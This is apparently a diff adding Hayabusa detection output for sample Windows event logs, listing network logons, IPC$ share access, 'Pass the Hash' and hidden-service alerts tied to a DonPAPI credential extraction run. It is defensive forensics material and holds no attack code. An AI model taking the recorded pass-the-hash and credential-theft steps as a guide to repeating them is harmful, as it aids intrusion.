+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x872496f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.189 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x87249a8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.269 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x87249e1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.333 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724a17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.382 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724ba1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.476 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724bd7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.539 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c0d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724c0d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.601 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c46,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724c46,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.664 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724d99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.743 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724dd2,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.821 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
